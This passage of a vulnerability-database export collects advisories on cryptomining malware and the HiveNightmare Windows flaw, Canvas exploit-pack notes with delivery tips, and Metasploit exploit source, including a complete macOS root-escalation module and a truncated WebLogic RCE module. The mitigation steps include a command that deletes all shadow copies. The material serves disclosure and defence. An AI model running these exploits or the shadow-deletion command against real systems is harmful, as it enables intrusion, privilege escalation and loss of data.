compromised.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/extension-1.png> \"\" )\n\n_Figure 10: The compromised extension with a rogue JavaScript for Coinhive_\n\nIt is worth noting that JavaScript is not the only way to mine for coins within the browser. Indeed, we have observed WebAssembly, a newer format available in modern browsers, being used more and more. WebAssembly modules have the advantage of running at near native speed, making them a lot faster and more efficient than JavaScript.\n \n \n | payload =\n \u00a0 - [ ExportSection\n \u00a0\u00a0\u00a0 | count = 27\n \u00a0\u00a0\u00a0 | entries =\n \u00a0\u00a0\u00a0 - [ ExportEntry\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_len = 9\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_str = \"stackSave\"\n \u00a0\u00a0\u00a0\u00a0\u00a0 | kind = 0x0\n \u00a0\u00a0\u00a0\u00a0\u00a0 | index = 71\n \u00a0\u00a0\u00a0 - [ ExportEntry\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_len = 17\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_str = \"_cryptonight_hash\"\n \u00a0\u00a0\u00a0\u00a0\u00a0 | kind = 0x0\n \u00a0\u00a0\u00a0\u00a0\u00a0 | index = 70\n\n_Figure 11: Code snippet from a WebAssembly module designed for mining Monero_\n\nWhile drive-by mining typically happens via the standard HTTP protocol\u2014either via HTTP or HTTPS connections\u2014we have witnessed more and more examples of miners communicating via WebSockets instead.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/websocket_-1.png> \"\" )\n\n_Figure 12: A Web Socket connection to Coinhive_\n\nA WebSocket is another communication protocol that allows streams of data to be exchanged. There is an initial handshake request and response with a remote server followed by the actual data streams. Coin mining code wrapped within a secure (wss) WebSocket is more difficult to identify and block.\n\n### Conclusion\n\nAs the threat landscape continues to evolve, its connections to real-world trends become more and more obvious. Malware authors are not only enjoying the relative anonymity provided by digital currencies but also want to amass them.\n\nCryptomining malware provides a good use case for leveraging the size and power of a botnet in order to perform CPU-intensive mining tasks without having to bear the costs incurred in the process. In some aspect, drive-by mining also applies the same concept, except that the botnet of web users it creates is mostly temporary.\n\nWhile malicious cryptomining appears to be far less dangerous to the user than ransomware, its effects should not be undermined. Indeed, unmanaged miners could seriously disrupt business or infrastructure critical processes by overloading systems to the point where they become unresponsive and shut down. Under the disguise of a financially-motivated attack, this could be the perfect alibi for advanced threat actors.\n\nMalwarebytes users, regardless of their platform, are protected against unwanted cryptomining, whether it is done via malware or the web.\n\nThe post [The state of malicious cryptomining](<https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-02-26T16:08:03", "type": "malwarebytes", "title": "The state of malicious cryptomining", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2018-02-26T16:08:03", "href": "https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/", "id": "MALWAREBYTES:B49179B9854ECB9B3B25403D4C9D0804", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "cert": [{"lastseen": "2023-05-23T17:12:01", "description": "### Overview\n\nMultiple versions of Windows 10 grant non-administrative users read access to files in the `%windir%\\system32\\config` directory. This can allow for local privilege escalation (LPE).\n\n### Description\n\nWith multiple versions of Windows 10, the `BUILTIN\\Users` group is given `RX` permissions to files in the `%windir%\\system32\\config` directory.\n\nIf a VSS shadow copy of the system drive is available, a non-privileged user may leverage access to these files to achieve a number of impacts, including but not limited to:\n\n * Extract and leverage account password hashes.\n * Discover the original Windows installation password.\n * Obtain DPAPI computer keys, which can be used to decrypt all computer private keys.\n * Obtain a computer machine account, which can be used in a [silver ticket attack](<https://www.sans.org/blog/kerberos-in-the-crosshairs-golden-tickets-silver-tickets-mitm-and-more/>).\n\nNote that VSS shadow copies may not be available in some configurations, however simply having a system drive that is larger that 128GB in size and then performing a Windows Update or installing an MSI will ensure that a VSS shadow copy will be [automatically created](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/system-restore-points-disabled#more-information>). To check if a system has VSS shadow copies available, run the following command from a privileged command prompt:\n\n`vssadmin list shadows`\n\nA system with VSS shadow copies will report details of at least one shadow copy that specifies `Original Volume: (C:)`, such as the following:\n \n \n vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool\n (C) Copyright 2001-2013 Microsoft Corp.\n \n Contents of shadow copy set ID: {d9e0503a-bafa-4255-bfc5-b781cb27737e}\n Contained 1 shadow copies at creation time: 7/19/2021 10:29:49 PM\n Shadow Copy ID: {b7f4115b-4242-4e13-84c0-869524965718}\n Original Volume: (C:)\\\\?\\Volume{4c1bc45e-359f-4517-88e4-e985330f72e9}\\\n Shadow Copy Volume: \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\n Originating Machine: DESKTOP-PAPIHMA\n Service Machine: DESKTOP-PAPIHMA\n Provider: 'Microsoft Software Shadow Copy provider 1.0'\n Type: ClientAccessibleWriters\n Attributes: Persistent, Client-accessible, No auto release, Differential, Auto recovered\n \n\nA system **without** VSS shadow copies will produce output like the following:\n \n \n vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool\n (C) Copyright 2001-2013 Microsoft Corp.\n \n No items found that satisfy the query.\n \n\nTo check if a system is vulnerable, the following command can be used from a non-privileged command prompt: `icacls %windir%\\system32\\config\\sam`\n\nA vulnerable system will report `BUILTIN\\Users:(I)(RX)` in the output like this:\n \n \n C:\\Windows\\system32\\config\\sam BUILTIN\\Administrators:(I)(F)\n NT AUTHORITY\\SYSTEM:(I)(F)\n BUILTIN\\Users:(I)(RX)\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n \n Successfully processed 1 files; Failed processing 0 files\n \n\nA system that is not vulnerable will report output like this:\n \n \n C:\\Windows\\system32\\config\\sam: Access is denied.\n Successfully processed 0 files; Failed processing 1 files\n \n\nThis vulnerability has been publicly referred to as both HiveNightmare and SeriousSAM, while Microsoft has assigned CVE-2021-36934 to the vulnerability.\n\n### Impact\n\nBy accessing files in the Windows `%windir%\\system32\\config` directory on a vulnerable system with at least one VSS shadow copy of the system drive, a local authenticated attacker may be able to achieve LPE, masquerade as other users, or achieve other security-related impacts.\n\n### Solution\n\nPlease see the [Microsoft bulletin for CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>), which contains a workaround. Specifically:\n\n#### Restrict access to %windir%\\system32\\config and remove VSS shadow copies\n\nVulnerable systems can enable ACL inheritance for files in the `%windir%\\system32\\config` directory by running the following command from an elevated prompt:\n \n \n icacls %windir%\\system32\\config\\*.* /inheritance:e\n \n\nOnce the ACLs have been corrected for these files, any VSS shadow copies of the system drive must be deleted to protect a system against exploitation. This can be accomplished with the following command:\n \n \n vssadmin delete shadows /for=%systemdrive% /Quiet\n \n\nConfirm that VSS shadow copies were deleted by running `vssadmin list shadows` again. Note that any capabilities relying on existing shadow copies, such as System Restore, will not function as expected. Newly-created shadow copies, which will contain the proper ACLs, will function as expected. Please see [KB5005357](<https://support.microsoft.com/en-us/topic/kb5005357-delete-volume-shadow-copies-1ceaa637-aaa3-4b58-a48b-baf72a2fa9e7>) for more details.\n\n### Acknowledgements\n\nThis vulnerability was publicly disclosed by Jonas Lyk, with additional details provided by Benjamin Delpy.\n\nThis document was written by Will Dormann.\n\n### Vendor Information\n\n506989\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Microsoft __ Affected\n\nNotified: 2021-07-20 Updated: 2021-07-20 **CVE-2021-36934**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>\n\n \n\n\n### References\n\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>\n * <https://support.microsoft.com/en-us/topic/kb5005357-delete-volume-shadow-copies-1ceaa637-aaa3-4b58-a48b-baf72a2fa9e7>\n * <https://twitter.com/jonasLyk/status/1417205166172950531>\n * <https://twitter.com/gentilkiwi/status/1417467063883476992>\n * <https://www.sans.org/blog/kerberos-in-the-crosshairs-golden-tickets-silver-tickets-mitm-and-more/>\n * <https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/system-restore-points-disabled#more-information>\n * <https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-36934 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-36934>) \n---|--- \n**Date Public:** | 2021-07-20 \n**Date First Published:** | 2021-07-20 \n**Date Last Updated: ** | 2021-07-29 16:29 UTC \n**Document Revision: ** | 11 \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-20T00:00:00", "type": "cert", "title": "Microsoft Windows 10 gives unprivileged user access to system32\\config files", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-29T16:29:00", "id": "VU:506989", "href": "https://www.kb.cert.org/vuls/id/506989", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "veeam": [{"lastseen": "2023-02-14T15:24:44", "description": "This article documents Veeam's position on Windows Elevation of Privilege Vulnerability CVE-2021-36934. Specifically regarding the listed mitigation steps involving removal of all shadow copies, and the \"Impact of workaround\" mentioned in the Workarounds section of CVE-2021-36934.", "cvss3": {}, "published": "2021-11-01T00:00:00", "type": "veeam", "title": "Veeam Best Practices regarding CVE-2021-36934", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-36934"], "modified": "2021-11-01T00:00:00", "id": "VEEAM:KB4231", "href": "https://www.veeam.com/kb4231", "cvss": {"score": 0.0, "vector": "NONE"}}], "rapid7blog": [{"lastseen": "2021-07-31T08:56:21", "description": "\n\nOn Monday, July 19, 2021, community security researchers began [reporting](<https://twitter.com/jonasLyk/status/1417205166172950531>) that the Security Account Manager (SAM) file on Windows 10 and 11 systems was READ-enabled for all local users. The SAM file is used to store sensitive security information, such as hashed user and admin passwords. READ enablement means attackers with a foothold on the system can use this security-related information to escalate privileges or access other data in the target environment.\n\nOn Tuesday, July 20, Microsoft issued an out-of-band advisory for this vulnerability, which is now tracked as [CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>). As of July 22, 2021, the vulnerability has been confirmed to affect Windows 10 version 1809 and later. A public proof-of-concept is available that allows non-admin users to retrieve all registry hives. Researcher Kevin Beaumont has also [released a demo](<https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5>) that confirms CVE-2021-36934 can be used to obtain local hashes and pass them to a remote machine, achieving remote code execution as SYSTEM on arbitrary targets (in addition to privilege escalation). The security community has christened this vulnerability \u201cHiveNightmare\u201d and \u201cSeriousSAM.\u201d\n\nCERT/CC [published in-depth vulnerability notes](<https://www.kb.cert.org/vuls/id/506989>) on CVE-2021-36934, which we highly recommend reading. Their analysis reveals that starting with Windows 10 build 1809, the BUILTIN\\Users group is given RX permissions to files in the `%windir%\\system32\\config` directory. If a VSS shadow copy of the system drive is available, a non-privileged user may leverage access to these files to:\n\n * Extract and leverage account password hashes.\n * Discover the original Windows installation password.\n * Obtain DPAPI computer keys, which can be used to decrypt all computer private keys.\n * Obtain a computer machine account, which can be used in a [silver ticket attack](<https://www.sans.org/blog/kerberos-in-the-crosshairs-golden-tickets-silver-tickets-mitm-and-more/>).\n\n**There is no patch for CVE-2021-36934 as of July 21, 2021.** Microsoft has released workarounds for Windows 10 and 11 customers that mitigate the risk of immediate exploitation\u2014we have reproduced these workarounds in the `Mitigation Guidance` section below. Please note that Windows customers must **BOTH** restrict access and delete shadow copies to prevent exploitation of CVE-2021-36934. We recommend applying the workarounds on an emergency basis.\n\n## Mitigation Guidance\n\n**1\\. Restrict access to the contents of `%windir%\\system32\\config`:**\n\n * Open Command Prompt or Windows PowerShell as an administrator.\n * Run this command:\n \n \n icacls %windir%\\system32\\config\\*.* /inheritance:e\n \n\n**2\\. Delete Volume Shadow Copy Service (VSS) shadow copies:**\n\n * Delete any System Restore points and Shadow volumes that existed prior to restricting access to `%windir%\\system32\\config`.\n * Create a new System Restore point if desired.\n\n**Windows 10 and 11 users must apply both workarounds to mitigate the risk of exploitation.** Microsoft has noted that deleting shadow copies may impact restore operations, including the ability to restore data with third-party backup applications.\n\nThis story is developing quickly. We will update this blog with new information as it becomes available.\n\n## Updates\n\n**July 27, 2021:** Microsoft has **removed Windows Server 2019 and Windows Server 20H2** from the list of versions affected by CVE-2021-36934.\n\n**July 22, 2021:** Microsoft added Windows Server 2019 and Windows Server 20H2 to the [list of affected versions](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>).\n\n## Resources\n\n * [Microsoft advisory for CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>)\n * [CERT/CC vulnerability notes](<https://www.kb.cert.org/vuls/id/506989>)\n * [Public PoC for CVE-2021-36934](<https://github.com/GossiTheDog/HiveNightmare>)\n * [Additional demo and analysis of CVE-2021-36934](<https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5>)", "cvss3": {}, "published": "2021-07-21T16:01:19", "type": "rapid7blog", "title": "Microsoft SAM File Readability CVE-2021-36934: What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-21T16:01:19", "id": "RAPID7BLOG:21FF66FD08C23AC39BCCB8CFE2238507", "href": "https://blog.rapid7.com/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "canvas": [{"lastseen": "2021-07-28T14:33:28", "description": "**Name**| osx_parsekeymapping \n---|--- \n**CVE**| CVE-2014-4404 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| IOHIKeyboardMapper::parseKeyMapping local privilege escalation \n**Notes**| CVE Name: CVE-2014-4404 \nVENDOR: Apple \nNotes: \n \nTested on: \n\\- 10.9 \n\\- 10.9.1 \n\\- 10.9.2 \n\\- 10.9.3 \n\\- 10.9.4 \n\\- 10.9.5 \n \n \nRepeatability: Multiple Times \nReferences: https://code.google.com/p/google-security-research/issues/detail?id=40 \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4404 \n\n", "cvss3": {}, "published": "2014-09-18T10:55:00", "type": "canvas", "title": "Immunity Canvas: OSX_PARSEKEYMAPPING", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4404"], "modified": "2014-09-18T10:55:00", "id": "OSX_PARSEKEYMAPPING", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/osx_parsekeymapping", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:19", "description": "**Name**| special_lnk \n---|--- \n**CVE**| CVE-2017-8464 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| special_lnk \n**Notes**| References: ['https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464', 'http://paper.seebug.org/357/', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'] \nCVE Name: CVE-2017-8464 \nVENDOR: Microsoft \nNOTES: \n**DIALOG BOX** \nIn the dialog box, both remote and local paths can be specified in such a way \nthat the LNK and DLL-based callback can be hosted by Canvas. To make Canvas \nput the correct IP in for your own system, start the SMB path with \\HOSTLOCAL. \nOther names than HOSTLOCAL can be entered as well, but HOSTLOCAL will be replaced \nwith the IP that your callback is listening on. \n \nShould you want to create the LNK and DLL for distribution via other means, using \ndisk-paths such as C:\\users\\target\\callback.dll will work. \n \n**NOTE** : To reiterate: an LNK path starting with \\HOSTLOCAL will tell the \nmodule to host the LNK itself. If you do not want this to happen, simply specify \nan on-disk path. \n \nTested on: \n\\- Windows 10 (64 bit) with (local + remote) DLL path \n\\- Windows 8 (32 bit) with local DLL path \n\\- Windows 7 (32 bit) with (local + remote) DLL path \n \n**HIGHLY IMPORTANT NOTE** \nIn our testing, we have discovered that this exploit is not just a clientside. \nOn multiple Windows 10 x64 systems we have noticed that in certain repeatable \ncircumstances, SearchProtocolHost.exe, a SYSTEM-privileged process, will \nrender the LNK. This behavior has not been observed on Windows 7 or Windows 8. \n \n**In order to use this exploit as an LPE, just rename the original LNK after \nyou have a shell** \n \nWe have observed in our labs that using a UNC path that maps to a WebDAV share \nis incredibly slow regardless of the software behind the share. For this reason \nwe recommend the use of an SMB share for remote/clientside exploitation where \ndelivery of only the LNK is possible. \n \nSpecial thanks to Haifei Li and VXJump for their analysis. \n \nDate public: 06/27/2017 \nCVE Url: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8464 \nCVSS: 7.5 \n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-15T01:29:00", "type": "canvas", "title": "Immunity Canvas: SPECIAL_LNK", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464"], "modified": "2017-06-15T01:29:00", "id": "SPECIAL_LNK", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/special_lnk", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:29", "description": "**Name**| rootpipe \n---|--- \n**CVE**| CVE-2015-1130 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| OS X XPC Admin Framework (rootpipe) local privilege escalation \n**Notes**| CVE Name: CVE-2015-1130 \nVENDOR: Apple \nNotes: \n \nThis is a local privilege escalation affecting all Mac OS X versions from 10.7 \nup to 10.10.2. We provide both a 32bit and 64bit version of the exploit. \n \nTested on: \n\\- 10.10.1 \n\\- 10.9.5 \n\\- 10.9.4 \n\\- 10.9.3 \n\\- 10.9.2 \n\\- 10.9.1 \n\\- 10.9 \n\\- 10.7.2 \n \nRepeatability: Multiple Times \nReferences: https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/ \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1130 \n\n", "cvss3": {}, "published": "2015-04-10T14:59:00", "type": "canvas", "title": "Immunity Canvas: ROOTPIPE", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1130"], "modified": "2015-04-10T14:59:00", "id": "ROOTPIPE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/rootpipe", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-01-02T12:21:13", "description": "A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory corruption in Mac OS X before 10.10. By abusing a bug in the IORegistry, kernel pointers can also be leaked, allowing a full kASLR bypass. Tested on Mavericks 10.9.5, and should work on previous versions. The issue was patched silently in Yosemite.\n", "cvss3": {}, "published": "2014-11-25T18:34:16", "type": "metasploit", "title": "Mac OS X IOKit Keyboard Driver Root Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-4404"], "modified": "2021-02-25T16:47:49", "id": "MSF:EXPLOIT-OSX-LOCAL-IOKIT_KEYBOARD_ROOT-", "href": "https://www.rapid7.com/db/modules/exploit/osx/local/iokit_keyboard_root/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ManualRanking # Can cause kernel crash\n\n include Msf::Post::File\n include Msf::Post::OSX::Priv\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Mac OS X IOKit Keyboard Driver Root Privilege Escalation',\n 'Description' => %q{\n A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory\n corruption in Mac OS X before 10.10. By abusing a bug in the IORegistry, kernel\n pointers can also be leaked, allowing a full kASLR bypass.\n\n Tested on Mavericks 10.9.5, and should work on previous versions.\n\n The issue was patched silently in Yosemite.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Ian Beer', # discovery, advisory, publication, and a most excellent blog post\n 'joev' # copy/paste monkey\n ],\n 'References' =>\n [\n [ 'CVE', '2014-4404' ],\n [ 'URL', 'http://googleprojectzero.blogspot.com/2014/11/pwn4fun-spring-2014-safari-part-ii.html' ],\n # Heap overflow:\n [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=40' ],\n # kALSR defeat:\n [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=126' ]\n ],\n 'Platform' => 'osx',\n 'Arch' => ARCH_X64,\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' => [\n [ 'Mac OS X 10.9.5 Mavericks x64 (Native Payload)', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2014-09-24'\n ))\n end\n\n def check\n if ver_lt(osx_ver, \"10.10\")\n CheckCode::Appears\n else\n CheckCode::Safe\n end\n end\n\n def exploit\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n if check != CheckCode::Appears\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\n end\n\n exploit_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2014-4404')\n binary_exploit = File.read(File.join(exploit_path, 'key_exploit'))\n binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)\n exploit_file = \"/tmp/#{Rex::Text::rand_text_alpha_lower(12)}\"\n payload_file = \"/tmp/#{Rex::Text::rand_text_alpha_lower(12)}\"\n\n print_status(\"Writing exploit file as '#{exploit_file}'\")\n write_file(exploit_file, binary_exploit)\n register_file_for_cleanup(exploit_file)\n\n print_status(\"Writing payload file as '#{payload_file}'\")\n write_file(payload_file, binary_payload)\n register_file_for_cleanup(payload_file)\n\n print_status(\"Executing payload...\")\n cmd_exec(\"chmod +x #{exploit_file}\")\n cmd_exec(\"chmod +x #{payload_file}\")\n cmd_exec(\"#{exploit_file} #{payload_file}\")\n end\n\n def osx_ver\n cmd_exec(\"sw_vers -productVersion\").to_s.strip\n end\n\n def ver_lt(a, b)\n Rex::Version.new(a) < Rex::Version.new(b)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/local/iokit_keyboard_root.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-23T01:32:13", "description": "The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check and will not be used when executing the exploit itself.\n", "cvss3": {}, "published": "2018-01-05T20:05:21", "type": "metasploit", "title": "Oracle WebLogic wls-wsat Component Deserialization RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2022-03-09T23:28:25", "id": "MSF:EXPLOIT-MULTI-HTTP-ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/oracle_weblogic_wsat_deserialization_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n # include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE',\n 'Description' => %q(\n The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization\n remote code execution vulnerability. Supported versions that are affected are\n 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin\n of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT,\n HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check\n and will not be used when executing the exploit itself.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module\n 'Luffin', # Proof of Concept\n 'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery\n ],\n 'References' =>\n [\n ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin\n ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept\n ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit\n ['CVE', '2017-10271'],\n ['EDB', '43458']\n ],\n 'Platform' => %w{ win unix },\n 'Arch' => [ ARCH_CMD ],\n 'Targets' =>\n [\n [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],\n [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]\n ],\n 'DisclosureDate' => '2017-10-19',\n # Note that this is by index, rather than name. It's generally easiest\n # just to put the default at the beginning of the list and skip this\n # entirely.\n 